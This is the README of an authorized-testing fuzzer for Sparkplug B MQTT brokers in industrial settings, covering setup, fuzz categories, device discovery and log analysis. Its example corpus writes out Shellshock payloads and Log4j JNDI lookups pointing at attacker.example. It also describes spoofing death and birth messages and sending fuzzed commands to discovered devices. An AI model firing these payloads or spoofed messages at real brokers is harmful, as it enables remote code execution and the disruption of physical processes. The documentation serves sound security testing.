A comprehensive security assessment tool for testing Sparkplug B MQTT protocol implementations. The fuzzer systematically tests all protocol fields across all 9 message types, discovers live devices on the network, and produces detailed logs for analysis.
This tool sends malformed, injection, and protocol-violating MQTT messages to a target broker. Only run it against systems you own or have explicit written authorization to test. Sparkplug B brokers commonly sit in OT/ICS environments where unexpected payloads can disrupt physical processes — assume every target is production-adjacent unless proven otherwise.
If you discover a vulnerability in a Sparkplug B implementation using this tool, please follow coordinated disclosure with the affected vendor. To report a security issue in this tool itself, see SECURITY.md.
- Overview
- Prerequisites
- Installation
- Quick Start
- Usage
- How It Works
- Running the tests
- Output and Log Analysis
- Protocol Coverage
- Architecture
The Sparkplug B specification defines a topic namespace and payload format built on MQTT and Google Protocol Buffers for Industrial IoT (IIoT) environments. This fuzzer assesses the security and robustness of Sparkplug B implementations by:
- Testing all 19 metric data types with boundary values and overflow conditions
- Injecting malicious strings (XSS, SQLi, format strings, path traversal, command injection)
- Creating type mismatches between declared datatypes and actual protobuf value fields
- Violating protocol state machine ordering (data before birth, double births, data after death)
- Corrupting serialized protobuf payloads at the binary level
- Spoofing birth/death certificates for discovered network devices
- Fuzzing MQTT topic namespaces with special characters, case variations, and structural violations
- Python 3.8+
- MQTT Broker — the target system under test (e.g., Mosquitto, HiveMQ, EMQX, or any Sparkplug B aware broker)
- Authorization — this tool is intended for authorized security testing only
On modern Debian/Ubuntu/Kali (PEP-668 systems), --setup cannot pip install into the system Python — use a virtual environment or pipx first. The recommended path:
python3 -m venv .venv
source .venv/bin/activate
python3 sparkplug-fuzzer.py --setup

Or run via pipx run if you prefer not to manage the venv yourself. On older systems without PEP-668 enforcement, plain python3 sparkplug-fuzzer.py --setup works directly.
--setup will:
- Install pip dependencies (paho-mqtt, protobuf)
- Clone a pinned tag of the Eclipse Tahu repository (see TAHU_REF in the script)
- Copy sparkplug_b.py and array_packer.py helper modules
- Compile sparkplug_b.proto into Python bindings (uses protoc if available, falls back to grpcio-tools)
- Clean up the Tahu clone
After setup, your directory should contain:
sparkplug-fuzzer.py # The fuzzer
sparkplug_b.py # Sparkplug B helper module (from Tahu)
array_packer.py # Array packing helper (from Tahu)
sparkplug_b_pb2.py # Generated protobuf bindings
requirements.txt # Python dependencies
Manual setup (if --setup doesn't work)
pip install -r requirements.txt
git clone https://github.com/eclipse/tahu.git
cp tahu/python/core/sparkplug_b.py .
cp tahu/python/core/array_packer.py .
protoc --python_out=. sparkplug_b.proto
rm -rf tahu

python3 sparkplug-fuzzer.py --setup # first-time setup
python3 sparkplug-fuzzer.py -H localhost -p 1883 -v # run fuzzer

This will:
- Connect to the broker at localhost:1883
- Listen for 10 seconds to discover existing Sparkplug devices
- Establish the fuzzer as a Sparkplug node/device
- Run all 12 fuzz categories (~635+ test cases)
- Target any discovered devices with spoofed messages
- Write results to sparkplug_fuzz.jsonl

python3 sparkplug-fuzzer.py [OPTIONS]
| Option | Default | Description |
|---|---|---|
| -H, --host | localhost | MQTT broker hostname or IP |
| -p, --port | 1883 (or 8883 with --tls) | MQTT broker port |
| -u, --username | None | MQTT username (also reads MQTT_USERNAME env var) |
| -P, --password | None | MQTT password (also reads MQTT_PASSWORD; pass - to read from stdin without echo) |
| --tls | off | Connect over TLS; default port becomes 8883 if -p unset |
| --cafile | None | CA bundle for TLS server certificate verification |
| --insecure | off | Skip TLS hostname/certificate verification (testing only) |
| -g, --group | Sparkplug B Devices | Sparkplug group ID the fuzzer registers under |
| -n, --node | FuzzNode | Sparkplug edge node ID for the fuzzer |
| -d, --device | FuzzDevice | Sparkplug device ID for the fuzzer |
| -c, --categories | all | Space-separated list of fuzz categories to run |
| --discovery-time | 10 | Seconds to passively listen for network discovery |
| --delay | 0.1 | Delay in seconds between fuzz messages |
| --probe-anon-write | off | During discovery, send one QoS=1 publish to confirm whether the broker accepts unauthenticated PUBLISH |
| -l, --log | sparkplug_fuzz.jsonl | Output log file name (relative paths land inside --output-dir; absolute paths are honored as-is) |
| --output-dir | ./sparkplug-runs/<UTC-ts>_<host>/ | Per-run output directory. Created if absent. |
| -v, --verbose | 0 | Increase console verbosity (-v = info, -vv = debug). -vv also surfaces fuzz-generator skips, and the throttled paho.mqtt logger bumps to INFO/DEBUG with verbosity. |
| --setup | - | Install all dependencies and exit |
| --tahu-path | - | Path to a local clone of eclipse/tahu (or its python/core directory). Used by --setup in air-gapped environments instead of git clone. |
| --extra-string-payloads | - | Path to a file of additional string-injection payloads (one per line, UTF-8). Appended to the built-in STRING_FUZZ_VALUES; does not replace them. Max 10 MB / 10,000 payloads. See Custom string corpora. |

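
The interplay between --log and --output-dir described in the options table can be sketched as follows. This is a minimal illustration rather than the fuzzer's actual code: default_run_dir and resolve_log_path are hypothetical names, and the timestamp format is an assumption.

```python
from datetime import datetime, timezone
from pathlib import Path


def default_run_dir(host, now=None):
    """Build sparkplug-runs/<UTC-ts>_<host> (timestamp format is assumed)."""
    now = now or datetime.now(timezone.utc)
    stamp = now.astimezone(timezone.utc).strftime("%Y-%m-%d_%H%M")
    return Path("sparkplug-runs") / f"{stamp}_{host}"


def resolve_log_path(log_name, output_dir):
    """Relative log names land inside output_dir; absolute paths are used as-is."""
    log_path = Path(log_name)
    if log_path.is_absolute():
        return log_path
    return Path(output_dir) / log_path
```

Passing the clock in as an argument keeps the naming logic testable without touching the filesystem; creating the directory would be a separate step.
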
| Category | Description | Approx. Cases |
|---|---|---|
| boundary | Min/max/overflow for all 19 numeric data types, is_null with values, flag combinations | ~200 |
| string | Injection payloads (XSS, SQLi, format strings, path traversal, command injection, null bytes) across String, Text, UUID, MetaData fields, and STATE messages | ~100 |
| type_mismatch | Declared datatype vs wrong protobuf value field, invalid datatype codes, multiple oneof fields | ~150 |
| sequence | Sequence gaps, duplicates, backwards, rollover, bdSeq mismatch between NBIRTH/NDEATH | ~20 |
| timestamp | Zero, max uint64, far future/past, metric vs payload timestamp inconsistency, DateTime extremes | ~15 |
| alias | Duplicate aliases for different metrics, extreme alias values, undefined aliases in data messages | ~15 |
| orphan | Data/commands targeting non-existent devices, nodes, groups; undefined template references | ~20 |
| ordering | Protocol state violations: data before birth, double births, data after death, wrong birth order | ~15 |
| recursive | Nested PropertySet chains (depth 1-100), key/value length mismatches, PropertySetList variations | ~15 |
| dataset | Column count mismatches, row element mismatches, type violations, empty/huge datasets, special chars in column names | ~25 |
| malformed | Binary protobuf corruption: truncation, bit flips, random bytes, overlong varints, wrong message classes | ~30 |
| topic | Case variations, wrong versions, extra/missing slashes, special characters, wildcards in topic strings | ~30 |

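
To make the topic category concrete, the sketch below derives a handful of malformed topics from one valid DDATA topic. It is an illustration only: topic_variants is a hypothetical helper, and the mutations shown are examples of the listed classes, not the fuzzer's actual case list.

```python
from typing import Iterator, Tuple


def topic_variants(group: str, node: str, device: str) -> Iterator[Tuple[str, str]]:
    """Yield (topic, description) pairs derived from one valid DDATA topic."""
    base = f"spBv1.0/{group}/DDATA/{node}/{device}"
    yield base.lower(), "lowercased namespace and message type"
    yield base.replace("spBv1.0", "spBv2.0", 1), "wrong namespace version"
    yield base.replace("/", "//", 1), "extra slash after the namespace"
    yield base.rsplit("/", 1)[0], "DDATA topic with the device level missing"
    yield f"spBv1.0/{group}/DDATA/{node}/#", "wildcard in a publish topic"
    yield base + "\u0000", "null character appended to the device ID"
```
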
Run all categories with authentication:
python3 sparkplug-fuzzer.py -H 10.0.1.30 -p 1883 -u admin -P secret -v

Pass credentials without exposing them in ps:
# Via environment
MQTT_USERNAME=admin MQTT_PASSWORD=secret python3 sparkplug-fuzzer.py -H broker.local
# Or read password from stdin (getpass, no echo)
python3 sparkplug-fuzzer.py -H broker.local -u admin -P -

Connect over TLS:
# System trust store, default port 8883
python3 sparkplug-fuzzer.py -H broker.example.com --tls -v
# Custom CA bundle
python3 sparkplug-fuzzer.py -H broker.example.com --tls --cafile ./ca.pem -v

Passive auth assessment + active write probe:
python3 sparkplug-fuzzer.py -H 10.0.1.30 --probe-anon-write -v

Run only injection-related categories:
python3 sparkplug-fuzzer.py -H broker.local -c string type_mismatch malformed

Extended discovery with slow pacing (minimize broker load):
python3 sparkplug-fuzzer.py -H 192.168.1.100 --discovery-time 60 --delay 0.5

Custom group/node identity and log file:
python3 sparkplug-fuzzer.py -H broker.local \
-g "Production Floor" -n "TestNode01" -d "TestDevice01" \
-l production_fuzz_results.jsonl -vv

Monitor broker traffic in a separate terminal:
mosquitto_sub -h <broker_host> -p 1883 -t 'spBv1.0/#' -F '%I %t %x'

Air-gapped setup with a pre-cloned Tahu repo:
git clone https://github.com/eclipse/tahu.git ~/tahu # on a connected box
# transfer ~/tahu to the air-gapped target, then on the target:
python3 sparkplug-fuzzer.py --setup --tahu-path ~/tahu

Per-run output layout:
# Default: directory is auto-named under ./sparkplug-runs/
python3 sparkplug-fuzzer.py -H broker.local
# -> creates ./sparkplug-runs/2026-05-05_1830_broker.local/sparkplug_fuzz.jsonl
# Explicit directory:
python3 sparkplug-fuzzer.py -H broker.local --output-dir ./fuzz-runs/acme-2026Q2

The built-in STRING_FUZZ_VALUES covers the classic injection categories (empty / huge strings, null bytes, format strings, XSS, SQLi, path traversal, prototype pollution). Real engagements often need second-order payloads aimed at whatever consumes the broker's data downstream: historians piping metric names through shell, Java-based SCADA hosts feeding values into log4j, dashboards rendering tag names in HTML, etc.
The --extra-string-payloads <FILE> flag appends an additional corpus to the built-ins. Format is one payload per line, UTF-8. Whitespace-only lines are kept (often intentional in fuzz); fully blank lines are dropped. The flag adds to the built-in list rather than replacing it, so existing coverage is preserved.
# corpus.txt — Shellshock + Log4j JNDI prefixes
cat > corpus.txt <<'EOF'
() { :;}; /bin/cat /etc/passwd
() { :; }; echo VULN
${jndi:ldap://attacker.example/x}
${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/x}
${${lower:jndi}:ldap://attacker.example/x}
EOF
python3 sparkplug-fuzzer.py -H broker.local --extra-string-payloads corpus.txt -v

The fuzzer prints [+] Extra string payloads: loaded N from <path> at startup, and each payload is emitted through every place that iterates STRING_FUZZ_VALUES: primarily the string category, but also the type-mismatch generator's string-typed cases.
Hard limits: 10 MB file size, 10,000 payloads. Adjust MAX_EXTRA_PAYLOADS_FILE_SIZE / MAX_EXTRA_PAYLOADS_COUNT at the top of the script if you need more (and have the run-time budget to match).
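
The file format and limits described above can be sketched as a small loader. This is an illustration under assumptions, not the script's implementation: load_extra_payloads is a hypothetical name, and raising on an exceeded limit (rather than truncating) is a guess at the behaviour.

```python
from pathlib import Path

# Limits quoted in this README; the constant names mirror the ones it mentions.
MAX_EXTRA_PAYLOADS_FILE_SIZE = 10 * 1024 * 1024  # 10 MB
MAX_EXTRA_PAYLOADS_COUNT = 10_000


def load_extra_payloads(path):
    """Hypothetical loader: one UTF-8 payload per line, fully blank lines dropped."""
    file_path = Path(path)
    if file_path.stat().st_size > MAX_EXTRA_PAYLOADS_FILE_SIZE:
        raise ValueError(f"{path}: file exceeds {MAX_EXTRA_PAYLOADS_FILE_SIZE} bytes")
    payloads = []
    with file_path.open(encoding="utf-8") as handle:
        for raw in handle:
            line = raw.rstrip("\n")
            if line == "":
                continue  # fully blank line: dropped
            payloads.append(line)  # whitespace-only lines are kept on purpose
            if len(payloads) > MAX_EXTRA_PAYLOADS_COUNT:
                raise ValueError(f"{path}: more than {MAX_EXTRA_PAYLOADS_COUNT} payloads")
    return payloads
```

The returned list would then be appended to the built-in values, for example `STRING_FUZZ_VALUES + load_extra_payloads("corpus.txt")`, so the original coverage is preserved.
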
- --output-dir flag plus auto-created ./sparkplug-runs/<UTC-ts>_<host>/ default: every run lands in its own directory so artifacts don't collide between runs.
- --tahu-path flag for --setup: points at a local clone of eclipse/tahu for air-gapped test environments where outbound git clone is blocked. The local source is never deleted on cleanup.
- Console + JSONL timestamps forced to UTC with explicit Z suffix so cross-correlation with broker logs is timezone-arithmetic-free.
- paho.mqtt logger throttled to WARNING by default; visible at INFO under -v, DEBUG under -vv. Per-packet client telemetry no longer drowns out fuzz signal.
- pytest test harness under tests/: 23 tests covering FuzzLogger, topic helper, output path resolution, and --tahu-path validation. See Running the tests.

The test harness covers the network-independent surface (logger correctness, topic builder, output-path resolution, --tahu-path parsing) and runs without a broker, paho-mqtt, or protobuf installed.
pip install -r requirements-dev.txt
pytest tests/

Expected: 23 passed. Network-dependent paths (PayloadBuilder protobuf, fuzz publishers, MQTT lifecycle) are deliberately deferred to a future integration-test layer with a containerized broker.

1. CONNECT Connect to MQTT broker with NDEATH as last-will-and-testament
Subscribe to spBv1.0/# and STATE/# for discovery
|
2. DISCOVER Passively listen for Sparkplug traffic (configurable duration)
Build map of groups, nodes, devices, and their metric definitions
|
3. ESTABLISH Publish fuzzer's own NBIRTH + DBIRTH to register as a valid node
|
4. FUZZ Run selected categories sequentially
Each category generator yields (topic, payload, description) tuples
Every publish logged via centralized _publish() method
Configurable delay between messages
|
5. TARGET For each discovered node/device:
- Spoof NDEATH (kill node)
- Spoof NBIRTH (impersonate node)
- Spoof DDEATH/DBIRTH (kill/impersonate device)
- Send DCMD/NCMD with fuzzed metric values
|
6. REPORT Print summary (total TX/RX counts by category)
Close log file, disconnect
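
Step 4 of the flow above can be sketched as a generator feeding a single publish-and-log loop. This is a simplified illustration: demo_sequence_cases and run_category are hypothetical names, the payload bytes are placeholders rather than real protobuf, and the case_id shape is copied from the log samples in this README.

```python
import time
from typing import Callable, Dict, Iterable, Iterator, List, Tuple

FuzzCase = Tuple[str, bytes, str]  # (topic, payload, description)


def demo_sequence_cases(group: str, node: str) -> Iterator[FuzzCase]:
    """Hypothetical category generator yielding (topic, payload, description)."""
    topic = f"spBv1.0/{group}/NDATA/{node}"
    for seq in (0, 255, 256):
        # Placeholder bytes only; a real case would carry a serialized payload.
        yield topic, seq.to_bytes(2, "big"), f"placeholder payload for seq={seq}"


def run_category(
    name: str,
    cases: Iterable[FuzzCase],
    publish: Callable[[str, bytes], None],
    log: List[Dict],
    delay: float = 0.1,
) -> int:
    """Log and publish every case through one code path; return the count sent."""
    sent = 0
    for sent, (topic, payload, description) in enumerate(cases, start=1):
        log.append({
            "dir": "TX",
            "case_id": f"{name.upper()}-{sent:04d}",
            "category": name,
            "topic": topic,
            "payload_len": len(payload),
            "description": description,
        })
        publish(topic, payload)
        time.sleep(delay)  # pacing between fuzz messages
    return sent
```

Because publish is injected, the loop can be exercised with a stub that appends to a list, which is one way to test case generation without a broker.
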
During the discovery phase, the fuzzer subscribes to spBv1.0/# and listens for all Sparkplug traffic. The DeviceTracker component parses observed messages to build a live network map:
- NBIRTH messages reveal edge nodes and their metric definitions (name, alias, datatype)
- DBIRTH messages reveal devices and their metric schemas
- NDEATH/DDEATH messages track node/device lifecycle state
- STATE messages reveal host applications and their online/offline status
This map is used in the targeted fuzzing phase to send contextually relevant attacks against real devices with their actual metric schemas.
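
The topic-level half of this discovery step can be sketched as below. It is a simplified stand-in for DeviceTracker, not its real interface: parse_topic and observe are hypothetical names, the network map is a plain dict, and metric schemas (which require decoding the protobuf payload) are left out.

```python
def parse_topic(topic):
    """Split a topic into its Sparkplug parts; return None for anything else."""
    parts = topic.split("/")
    if len(parts) == 2 and parts[0] == "STATE":
        return {"type": "STATE", "host_id": parts[1]}
    if len(parts) in (4, 5) and parts[0] == "spBv1.0":
        return {
            "type": parts[2],
            "group": parts[1],
            "node": parts[3],
            "device": parts[4] if len(parts) == 5 else None,
        }
    return None


def observe(network, topic):
    """Update the network map from one observed topic."""
    info = parse_topic(topic)
    if info is None:
        return
    if info["type"] == "STATE":
        network["hosts"].add(info["host_id"])
        return
    node_key = (info["group"], info["node"])
    if info["type"] == "NBIRTH":
        network["nodes"][node_key] = "online"
    elif info["type"] == "NDEATH":
        network["nodes"][node_key] = "offline"
    elif info["type"] in ("DBIRTH", "DDEATH"):
        state = "online" if info["type"] == "DBIRTH" else "offline"
        network["devices"][node_key + (info["device"],)] = state
```
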
When the fuzzer connects without -u/-P (and MQTT_USERNAME/MQTT_PASSWORD aren't set), it derives a broker auth posture from passive discovery alone. This produces a single AUTH_ASSESSMENT event in the log and a printed summary:
| Signal | What it means | How it's derived |
|---|---|---|
| anon_connect_accepted | Broker accepted CONNECT without credentials | The fuzzer's own CONNECT succeeded |
| anon_subscribe_accepted | Broker forwards spBv1.0/# / STATE/# to anonymous clients | At least one RX message arrived during the listen window |
| anon_publish_accepted | Broker accepts PUBLISH from anonymous clients | Set only if --probe-anon-write is passed; QoS=1 probe + PUBACK wait |
| unauth_endpoints | Nodes / devices / host applications observable without auth | Every entity in the discovered network map (credentials were never presented) |

The QoS=1 probe is opt-in because it crosses from passive into active. With QoS=0 the broker silently drops messages it would deny, so confirming write-accept requires reading a PUBACK.
MQTT/Sparkplug have no per-endpoint auth — auth is a broker-level concern. So "endpoints observable without authentication" is reported as a list of targets reachable at zero cost rather than as a property of the endpoints themselves.
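
How the four signals combine can be sketched as a small pure function. This is an illustration, not the fuzzer's code: assess_auth is a hypothetical name, and representing an unprobed anon_publish_accepted as None is an assumption.

```python
def assess_auth(connected, rx_count, endpoints, puback=None):
    """Derive the four signals for a session opened without credentials.

    puback stays None when the active write probe was not requested,
    True if the QoS=1 probe was acknowledged, False if it was not.
    """
    return {
        "anon_connect_accepted": bool(connected),
        "anon_subscribe_accepted": rx_count > 0,
        "anon_publish_accepted": puback,
        "unauth_endpoints": list(endpoints),
    }
```

Keeping the probe result three-valued separates "not tested" from "tested and denied", which matters when the passive-only run is the default.
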
After systematic fuzzing, the tool targets each discovered device with:
- Spoofed death notices: publishes NDEATH/DDEATH to trick subscribers into thinking devices went offline
- Spoofed birth certificates: publishes NBIRTH/DBIRTH to impersonate discovered nodes/devices
- Command injection: sends NCMD/DCMD messages with boundary values for each known metric, testing whether the target validates inbound commands
- Rebirth commands: sends Node Control/Rebirth NCMD to trigger devices to republish their births

The log file uses JSON-lines format (.jsonl) — one JSON object per line, suitable for analysis with jq, Python, or any JSON-capable tool.
Payloads larger than 64 KiB are not hex-inlined; instead payload_hex carries sha256:<digest>+len=<n> so the log stays bounded for very large fuzz cases. payload_len is always present.
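
The inlining rule above amounts to a few lines. The sketch below is a hedged illustration: payload_hex_field and INLINE_LIMIT are hypothetical names, and only the 64 KiB threshold and the sha256:<digest>+len=<n> shape come from this README.

```python
import hashlib

INLINE_LIMIT = 64 * 1024  # payloads larger than this are summarized, not inlined


def payload_hex_field(payload: bytes) -> str:
    """Return the value stored under payload_hex for one logged message."""
    if len(payload) > INLINE_LIMIT:
        digest = hashlib.sha256(payload).hexdigest()
        return f"sha256:{digest}+len={len(payload)}"
    return payload.hex()
```

When analysing logs, a payload_hex value starting with `sha256:` therefore signals that the raw bytes are not recoverable from the log itself.
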
TX record (outbound fuzz message):
{
"ts": "2026-04-10T15:30:00.123456Z",
"dir": "TX",
"case_id": "BOUNDARY-0042",
"category": "boundary",
"topic": "spBv1.0/Sparkplug B Devices/DDATA/FuzzNode/FuzzDevice",
"payload_hex": "0800120a0a06...",
"payload_len": 28,
"payload_decoded": {"timestamp": 1712345678000, "metrics": [{"name": "fuzz/boundary/Int32", "datatype": 3, "int_value": 2147483647}]},
"description": "Boundary Int32 = 2147483647 (int_value)"
}

RX record (inbound message from network):
{
"ts": "2026-04-10T15:30:01.456789Z",
"dir": "RX",
"topic": "spBv1.0/Production/NBIRTH/PLC01",
"payload_hex": "0800120f...",
"payload_len": 156,
"payload_decoded": {"timestamp": 1712345679000, "metrics": [{"name": "Node Control/Rebirth", "datatype": 11, "boolean_value": false}]}
}

Event record (system event):
{
"ts": "2026-04-10T15:29:50.000000Z",
"dir": "EVENT",
"event": "DISCOVERY_COMPLETE",
"details": {"groups": ["Production"], "node_count": 3, "device_count": 7, "targets": 10}
}

Count cases by category:
grep '"dir": "TX"' sparkplug_fuzz.jsonl | jq -r '.category' | sort | uniq -c | sort -rn

Extract all string injection cases:
jq 'select(.category == "string")' sparkplug_fuzz.jsonl

List all discovered devices:
jq 'select(.event == "DISCOVERY_COMPLETE")' sparkplug_fuzz.jsonl

Find cases that triggered broker disconnects:
jq 'select(.event == "UNEXPECTED_DISCONNECT" or .event == "RECONNECT_FAIL")' sparkplug_fuzz.jsonl

Pull the authentication assessment:
jq 'select(.event == "AUTH_ASSESSMENT")' sparkplug_fuzz.jsonl

List endpoints reachable without authentication:
jq -r 'select(.event == "AUTH_ASSESSMENT") | .details.unauth_endpoints[] | [.kind, .group, .node, .device, .host_id, .status] | @tsv' sparkplug_fuzz.jsonl

Get TX count over time (for rate analysis):
grep '"dir": "TX"' sparkplug_fuzz.jsonl | jq -r '.ts[:19]' | uniq -c

Export all topics that were published to:
jq -r 'select(.dir == "TX") | .topic' sparkplug_fuzz.jsonl | sort -u

Analyze with Python:
import json

# Load every record, skipping any blank lines in the log
with open("sparkplug_fuzz.jsonl") as f:
    records = [json.loads(line) for line in f if line.strip()]

# Split records by direction
tx = [r for r in records if r["dir"] == "TX"]
rx = [r for r in records if r["dir"] == "RX"]
events = [r for r in records if r["dir"] == "EVENT"]
print(f"Total TX: {len(tx)}, RX: {len(rx)}, Events: {len(events)}")

# Find any decode errors in received messages (possible crash indicators)
errors = [r for r in rx if "_decode_error" in str(r.get("payload_decoded", {}))]
print(f"Decode errors in RX: {len(errors)}")

All 9 Sparkplug B message types are tested:
| Message Type | Topic Pattern | Description | Fuzzer Usage |
|---|---|---|---|
| NBIRTH | spBv1.0/{group}/NBIRTH/{node} | Node birth certificate | Establishes fuzzer presence; spoofed for discovered nodes; ordering tests |
| NDEATH | spBv1.0/{group}/NDEATH/{node} | Node death notification | MQTT last-will; spoofed for discovered nodes; ordering tests |
| DBIRTH | spBv1.0/{group}/DBIRTH/{node}/{device} | Device birth certificate | Establishes fuzzer device; spoofed for discovered devices; ordering tests |
| DDEATH | spBv1.0/{group}/DDEATH/{node}/{device} | Device death notification | Spoofed for discovered devices; ordering tests; orphan tests |
| NDATA | spBv1.0/{group}/NDATA/{node} | Node data update | Boundary values; sequence numbers; ordering tests |
| DDATA | spBv1.0/{group}/DDATA/{node}/{device} | Device data update | Primary vehicle for most fuzz categories |
| NCMD | spBv1.0/{group}/NCMD/{node} | Node command | Targeted fuzzing (rebirth commands); orphan tests |
| DCMD | spBv1.0/{group}/DCMD/{node}/{device} | Device command | Targeted fuzzing against discovered device metrics; orphan tests |
| STATE | STATE/{host_id} | Host application state (JSON) | Malformed JSON injection |

All 19 Sparkplug B metric data types are tested with type-specific boundary values:
| Code | Type | Protobuf Field | Boundary Values Tested |
|---|---|---|---|
| 1 | Int8 | int_value | 0, -128, 127, 128 (overflow), -129 (underflow) |
| 2 | Int16 | int_value | 0, -32768, 32767, overflow/underflow |
| 3 | Int32 | int_value | 0, -2^31, 2^31-1, overflow/underflow |
| 4 | Int64 | long_value | 0, -2^63, 2^63-1, overflow |
| 5 | UInt8 | int_value | 0, 255, 256, -1 |
| 6 | UInt16 | int_value | 0, 65535, 65536, -1 |
| 7 | UInt32 | int_value | 0, 4294967295, -1 |
| 8 | UInt64 | long_value | 0, 2^64-1, -1 |
| 9 | Float | float_value | 0.0, -0.0, max, min, inf, -inf, NaN |
| 10 | Double | double_value | 0.0, -0.0, max, min, inf, -inf, NaN |
| 11 | Boolean | boolean_value | True, False; also tested with raw int values (0, 1, 2, 255) |
| 12 | String | string_value | Empty, long (up to 64KB), injection payloads |
| 13 | DateTime | long_value | Epoch, max, far future/past |
| 14 | Text | string_value | Same injection payloads as String |
| 15 | UUID | string_value | Empty, valid, invalid format, injections |
| 16 | DataSet | dataset_value | Structural violations via dataset category |
| 17 | Bytes | bytes_value | Empty, null bytes, random, large |
| 18 | File | bytes_value | Empty, magic bytes, large |
| 19 | Template | template_value | Undefined references, orphan templates |
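
For the integer rows in the table above, the boundary values follow directly from the bit width. The sketch below shows that derivation; int_boundaries is a hypothetical helper, and it always emits both the overflow and underflow value, which is slightly more than the table lists for some types.

```python
def int_boundaries(bits: int, signed: bool) -> list:
    """Return zero, min, max, max+1 (overflow) and min-1 (underflow) for a width."""
    if signed:
        low, high = -(1 << (bits - 1)), (1 << (bits - 1)) - 1
    else:
        low, high = 0, (1 << bits) - 1
    candidates = [0, low, high, high + 1, low - 1]
    # dict.fromkeys drops duplicates (unsigned min equals 0) while keeping order.
    return list(dict.fromkeys(candidates))
```

For example, `int_boundaries(8, signed=True)` yields the Int8 row and `int_boundaries(8, signed=False)` yields the UInt8 row.
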
The fuzzer covers 87+ unique protobuf field paths including:
- Payload root fields: timestamp, seq, uuid, body, metrics
- Metric fields: name, alias, timestamp, datatype, is_historical, is_transient, is_null, metadata, properties, and all value oneof variants
- MetaData fields: is_multi_part, content_type, size, seq, file_name, file_type, md5, description
- PropertySet/PropertyValue: keys, values, type, is_null, recursive propertyset_value, propertysets_value
- DataSet: num_of_columns, columns, types, rows, elements, all DataSetValue variants
- Template: version, template_ref, is_definition, nested metrics, parameters
The fuzzer is a single Python file organized into these components:
sparkplug-fuzzer.py
|
+-- Constants / ALL_METRIC_TYPES / STRING_FUZZ_VALUES
| Type definitions and fuzz value tables
|
+-- FuzzLogger
| JSON-lines file logging + console output
| Protobuf payload decoding
|
+-- DeviceTracker
| Passive network discovery
| Tracks groups, nodes, devices, metrics
|
+-- PayloadBuilder
| Valid payload construction (sparkplug_b helpers)
| Raw payload construction (sparkplug_b_pb2 direct)
| Binary corruption (truncate, flip, append)
|
+-- 12 Fuzz Generators
| Each is a Python generator yielding (topic, bytes, desc)
| Covers boundary, string, type, seq, timestamp, alias,
| orphan, ordering, recursive, dataset, malformed, topic
|
+-- SparkplugFuzzer
| Orchestration: connect, discover, fuzz, target, report
| Centralized publish with logging
| Auto-reconnect on disconnect
|
+-- CLI (argparse) + main()
Argument parsing and entry point
The two-level payload construction is a key design decision:
- High-level (PayloadBuilder.node_birth(), etc.) uses sparkplug_b helper functions to build valid, well-formed payloads. Used for establishing presence and targeted spoofing.
- Low-level (PayloadBuilder.raw_payload(), corrupt_bytes()) directly manipulates sparkplug_b_pb2 protobuf objects or raw bytes, bypassing validation. Used for intentionally malformed payloads that test parser error handling and edge cases.

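
The byte-level side of the low-level path can be illustrated with three small mutators matching the truncate, flip, and append operations named in the component overview. This is a sketch only: the function names and signatures are hypothetical and do not reflect the real corrupt_bytes() interface.

```python
import random


def truncate(payload: bytes, keep: int) -> bytes:
    """Cut the serialized payload short, e.g. mid-field."""
    return payload[:keep]


def flip_bit(payload: bytes, bit_index: int) -> bytes:
    """Flip one bit; the index wraps around the payload length."""
    if not payload:
        return payload
    byte_index, bit = divmod(bit_index % (len(payload) * 8), 8)
    mutated = bytearray(payload)
    mutated[byte_index] ^= 1 << bit
    return bytes(mutated)


def append_random(payload: bytes, count: int, rng: random.Random) -> bytes:
    """Append trailing garbage after an otherwise valid message."""
    return payload + bytes(rng.randrange(256) for _ in range(count))
```

Passing a seeded `random.Random` instance keeps a corrupted case reproducible, which helps when a specific payload needs to be replayed against a target.
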
This project is licensed under the MIT License — see LICENSE for the full text.
sparkplug-fuzzer.py --setup fetches the following components from Eclipse Tahu at install time and copies them into the working directory:
- sparkplug_b.py: Sparkplug B helper module
- array_packer.py: Array packing helper
- sparkplug_b.proto: Protocol Buffer definition (used to generate sparkplug_b_pb2.py)

Eclipse Tahu is distributed under the Apache License, Version 2.0. None of the Tahu source files are redistributed in this repository. See NOTICE for the full attribution.